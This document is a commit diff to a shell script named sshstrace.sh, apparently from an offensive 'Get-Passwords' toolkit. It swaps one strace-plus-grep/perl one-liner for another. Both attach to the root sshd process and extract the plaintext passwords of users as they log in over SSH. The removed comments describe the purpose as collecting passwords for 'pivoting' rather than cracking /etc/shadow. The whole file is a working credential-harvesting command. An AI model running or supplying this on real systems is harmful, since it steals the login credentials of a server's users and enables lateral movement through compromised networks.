Update sshstrace.sh

Get-Passwords/sshstrace.sh

@@ -1,9 +1,5 @@
 #!/bin/bash
 #
-# In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
-# Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
-# I think I fixed the random char padding problem, but now perl is required
-# Turns out it also doesn't work if the password is entirely numbers.
-#
+# This one seems pretty effective for OpenSSH 6 and 7.
 
-strace -s 128 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -oP 'write\(4, "\\0\\0\\0\\[\d]*[^\\]{2,}[^\\0]"' | perl -pe 's/write\(4, "\\0\\0\\0\\([\d]+|[\w])(.*)"/\2/g'
+strace -xx -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -P 'write\(4, "\\x00' | perl -lne '$|++; @F=/"\s*([^"]+)\s*"/g;for (@F){tr/\\x//d}; print for @F'|grep --line-buffered -oP '.{8}\K([2-7][0-9a-f])*$'|grep --line-buffered -v '^64$'|perl -pe 's/([0-9a-f]{2})/chr hex $1/gie'